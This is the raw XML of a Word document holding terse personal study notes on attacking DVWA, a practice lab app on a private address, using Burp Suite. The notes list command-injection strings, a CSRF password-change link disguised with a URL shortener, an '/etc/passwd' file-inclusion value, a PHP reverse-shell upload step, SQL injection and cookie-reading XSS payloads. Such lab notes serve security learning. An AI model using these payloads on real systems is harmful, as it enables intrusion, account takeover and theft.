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5B700" w14:textId="55C9235A" w:rsidR="005C2458" w:rsidRDefault="00700D8A">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Burfsuite</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63487FE3" w14:textId="77777777" w:rsidR="00401CE7" w:rsidRDefault="00401CE7">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2F4E0AA2" w14:textId="7F51FD4F" w:rsidR="00401CE7" w:rsidRDefault="00401CE7">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>testnew</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A764941" w14:textId="77777777" w:rsidR="00055901" w:rsidRDefault="00055901">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="432D2A17" w14:textId="159FC31B" w:rsidR="00055901" w:rsidRDefault="00055901">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00055901">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>https://www.youtube.com/watch?v=yE29bkem-yU</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C628EE4" w14:textId="53F585D0" w:rsidR="00D27AE0" w:rsidRDefault="004B4A6D" w:rsidP="004B4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Brute force</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04EA3E67" w14:textId="743F5BB2" w:rsidR="004B4A6D" w:rsidRDefault="004B4A6D" w:rsidP="004B4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Sent to intruder</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D69DFAD" w14:textId="6952D97F" w:rsidR="007052C7" w:rsidRDefault="007052C7" w:rsidP="004B4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user name and password</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76D2AAF1" w14:textId="3181C531" w:rsidR="007052C7" w:rsidRDefault="007052C7" w:rsidP="004B4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Attack – cluster bomb attack</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DD832ED" w14:textId="3A7D5388" w:rsidR="003C38D7" w:rsidRDefault="003C38D7" w:rsidP="004B4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Clear</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52DBD0D8" w14:textId="10A28380" w:rsidR="003C38D7" w:rsidRDefault="003C38D7" w:rsidP="004B4A6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Username</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15CAD6BC" w14:textId="61F470EB" w:rsidR="003C38D7" w:rsidRDefault="003C38D7" w:rsidP="003C38D7">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Command Injection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="127B4EF1" w14:textId="1915D0F2" w:rsidR="003C38D7" w:rsidRDefault="003C38D7" w:rsidP="003C38D7">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Enter an IP – 8.8.8.8</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EE3861E" w14:textId="000040F2" w:rsidR="003C38D7" w:rsidRDefault="003C38D7" w:rsidP="003C38D7">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Gives ping result</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3086030E" w14:textId="7EF4A565" w:rsidR="003C38D7" w:rsidRDefault="00B47A63" w:rsidP="003C38D7">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidR="00A90B41">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>;ls</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="150C1453" w14:textId="5EE7C551" w:rsidR="00AE1320" w:rsidRDefault="00AE1320" w:rsidP="003C38D7">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>1;pwd</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4004FFBA" w14:textId="3C19E5B6" w:rsidR="00673E31" w:rsidRDefault="00673E31" w:rsidP="003C38D7">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>8.8.8.8;pwd</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16883B65" w14:textId="47CF3D1E" w:rsidR="00673E31" w:rsidRDefault="00673E31" w:rsidP="003C38D7">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>; or |</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EEB0D76" w14:textId="10C7488C" w:rsidR="006506A2" w:rsidRDefault="00805F1E" w:rsidP="003C38D7">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>It displays result of ls</w:t>
      </w:r>
      <w:r w:rsidR="007D725F">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> or pwd</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DA8329E" w14:textId="7854BEE1" w:rsidR="00805F1E" w:rsidRDefault="002C4726" w:rsidP="003C38D7">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>CSRF</w:t>
      </w:r>
      <w:r w:rsidR="00A17894">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> (Cross Site Request Forgery)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16FA746F" w14:textId="65F22A90" w:rsidR="002C4726" w:rsidRDefault="00A970F2" w:rsidP="003C38D7">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>E</w:t>
      </w:r>
      <w:r w:rsidR="00265329">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ncoding</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24BA174B" w14:textId="2A8B9989" w:rsidR="00A970F2" w:rsidRDefault="00A970F2" w:rsidP="003C38D7">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>url encoder</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01AFC917" w14:textId="3E88E4B0" w:rsidR="00A970F2" w:rsidRDefault="00A970F2" w:rsidP="003C38D7">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>url shortner</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2989884D" w14:textId="3341C900" w:rsidR="00F70DC8" w:rsidRDefault="00F70DC8" w:rsidP="003C38D7">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>tinyurl.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CC67F0A" w14:textId="3A8AE75B" w:rsidR="00F70DC8" w:rsidRDefault="00182053" w:rsidP="003C38D7">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId5" w:history="1">
        <w:r w:rsidRPr="00F745D0">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>https://tinyurl.com/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="0867F393" w14:textId="77777777" w:rsidR="00182053" w:rsidRDefault="00182053" w:rsidP="003C38D7">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3DD97F59" w14:textId="4E9DE4A4" w:rsidR="00182053" w:rsidRDefault="00182053" w:rsidP="003C38D7">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId6" w:history="1">
        <w:r w:rsidRPr="00F745D0">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>http://192.168.0.123/dvwa/vulnerabilities/csrf/?password_new=raghu&amp;password_conf=raghu&amp;Change=Change#</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="3E73A3D9" w14:textId="3701F9DA" w:rsidR="00182053" w:rsidRDefault="00847B1D" w:rsidP="003C38D7">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>shorten url</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F1B014C" w14:textId="19283413" w:rsidR="00013139" w:rsidRDefault="00013139" w:rsidP="003C38D7">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId7" w:history="1">
        <w:r w:rsidRPr="00F745D0">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>https://tinyurl.com/mptx4vz7</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="42AE51C0" w14:textId="77777777" w:rsidR="00CD0548" w:rsidRDefault="00CD0548" w:rsidP="003C38D7">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="22B1EC97" w14:textId="226F674C" w:rsidR="00CD0548" w:rsidRDefault="00CD0548" w:rsidP="003C38D7">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>File Upload</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EC88BD0" w14:textId="2465D68A" w:rsidR="00982970" w:rsidRDefault="00982970" w:rsidP="003C38D7">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>File1.php</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BF5E34B" w14:textId="180DF1D0" w:rsidR="00982970" w:rsidRDefault="00982970" w:rsidP="003C38D7">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>File2.php</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A95A630" w14:textId="0436925C" w:rsidR="00982970" w:rsidRDefault="00982970" w:rsidP="003C38D7">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>File3.php</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27D176C3" w14:textId="1686EB76" w:rsidR="00CD0548" w:rsidRDefault="00CD0548" w:rsidP="003C38D7">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Page=/etc/pass</w:t>
      </w:r>
      <w:r w:rsidR="009A1D71">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>wd</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63DC7BCF" w14:textId="6A7DC808" w:rsidR="002D701E" w:rsidRDefault="002D701E" w:rsidP="003C38D7">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>File inclusion payloads</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39333581" w14:textId="48BF158C" w:rsidR="002D701E" w:rsidRDefault="00855F94" w:rsidP="003C38D7">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>File Upload</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4124951D" w14:textId="38961C43" w:rsidR="005E558D" w:rsidRDefault="00931417" w:rsidP="005E558D">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>We will upload mal</w:t>
      </w:r>
      <w:r w:rsidR="005E558D">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>icious file</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E3475D3" w14:textId="31868685" w:rsidR="005E558D" w:rsidRDefault="005E558D" w:rsidP="005E558D">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005E558D">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>cp /usr/share/webshells/php/php-reverse-shell.php /home/kaushalya/Desktop/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11B1DCF3" w14:textId="3AA8BB39" w:rsidR="002B26B1" w:rsidRDefault="002B26B1" w:rsidP="005E558D">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>SQL Injection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F2242F0" w14:textId="0B876ADF" w:rsidR="003D6622" w:rsidRDefault="003D6622" w:rsidP="005E558D">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>‘</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45FDDFE0" w14:textId="72757D40" w:rsidR="002B26B1" w:rsidRDefault="002B26B1" w:rsidP="005E558D">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>‘ or 1=1#</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="272C032B" w14:textId="34887D26" w:rsidR="003D6622" w:rsidRDefault="003D6622" w:rsidP="005E558D">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Sqllite payloads</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="230351DF" w14:textId="77777777" w:rsidR="00800872" w:rsidRDefault="00800872" w:rsidP="005E558D">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="33E13EE4" w14:textId="6FA36B16" w:rsidR="00800872" w:rsidRDefault="00800872" w:rsidP="005E558D">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>SQL Injection blind</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13887711" w14:textId="3B6749ED" w:rsidR="008238DB" w:rsidRDefault="008238DB" w:rsidP="005E558D">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>XSS – Cross Site Scripting</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03F5B53A" w14:textId="44C155B7" w:rsidR="008238DB" w:rsidRDefault="008238DB" w:rsidP="005E558D">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>?default=&lt;script&gt;alert(“hacked”)&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D044DC3" w14:textId="552A29DD" w:rsidR="008F43B2" w:rsidRDefault="008F43B2" w:rsidP="008F43B2">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>?default=&lt;script&gt;</w:t>
      </w:r>
      <w:r w:rsidR="00C41802">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>alert(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>document.cookie</w:t>
      </w:r>
      <w:r w:rsidR="00C41802">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49B9B1B9" w14:textId="77777777" w:rsidR="008F43B2" w:rsidRDefault="008F43B2" w:rsidP="005E558D">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="32218597" w14:textId="77777777" w:rsidR="002B26B1" w:rsidRDefault="002B26B1" w:rsidP="005E558D">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7297B5C1" w14:textId="77777777" w:rsidR="005E558D" w:rsidRDefault="005E558D" w:rsidP="003C38D7">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="24CF9E47" w14:textId="77777777" w:rsidR="00931417" w:rsidRDefault="00931417" w:rsidP="003C38D7">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3DE81003" w14:textId="77777777" w:rsidR="00A970F2" w:rsidRPr="003C38D7" w:rsidRDefault="00A970F2" w:rsidP="003C38D7">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="00A970F2" w:rsidRPr="003C3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51BE3"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="82187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6015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5D"/>
    <w:rsid w:val="00013139"/>
    <w:rsid w:val="00055901"/>
    <w:rsid w:val="00182053"/>
    <w:rsid w:val="00265329"/>
    <w:rsid w:val="002B26B1"/>
    <w:rsid w:val="002C4726"/>
    <w:rsid w:val="002D701E"/>
    <w:rsid w:val="0031376D"/>
    <w:rsid w:val="003C38D7"/>
    <w:rsid w:val="003D6622"/>
    <w:rsid w:val="00401CE7"/>
    <w:rsid w:val="00445068"/>
    <w:rsid w:val="00496D5D"/>
    <w:rsid w:val="004B4A6D"/>
    <w:rsid w:val="005C2458"/>
    <w:rsid w:val="005E558D"/>
    <w:rsid w:val="006506A2"/>
    <w:rsid w:val="00673E31"/>
    <w:rsid w:val="00700D8A"/>
    <w:rsid w:val="007052C7"/>
    <w:rsid w:val="007D725F"/>
    <w:rsid w:val="007F79F1"/>
    <w:rsid w:val="00800872"/>
    <w:rsid w:val="00800A56"/>
    <w:rsid w:val="00805F1E"/>
    <w:rsid w:val="008238DB"/>
    <w:rsid w:val="00847B1D"/>
    <w:rsid w:val="00852C1F"/>
    <w:rsid w:val="00855F94"/>
    <w:rsid w:val="008F43B2"/>
    <w:rsid w:val="00931417"/>
    <w:rsid w:val="00982970"/>
    <w:rsid w:val="009A1D71"/>
    <w:rsid w:val="00A17894"/>
    <w:rsid w:val="00A90B41"/>
    <w:rsid w:val="00A970F2"/>
    <w:rsid w:val="00AE1320"/>
    <w:rsid w:val="00B47A63"/>
    <w:rsid w:val="00C15A17"/>
    <w:rsid w:val="00C41802"/>
    <w:rsid w:val="00CD0548"/>
    <w:rsid w:val="00D27AE0"/>
    <w:rsid w:val="00F7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8BA4"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{828258D3-8C43-47DF-80B0-AFA360373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D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20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0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inyurl.com/mptx4vz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92.168.0.123/dvwa/vulnerabilities/csrf/?password_new=raghu&amp;password_conf=raghu&amp;Change=Change#" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://tinyurl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prasad konandur</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>raghu prasad konandur</cp:lastModifiedBy>
  <cp:revision>38</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2026-01-22T13:35:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-01-23T01:32:00Z</dcterms:modified>
</cp:coreProperties>
</file>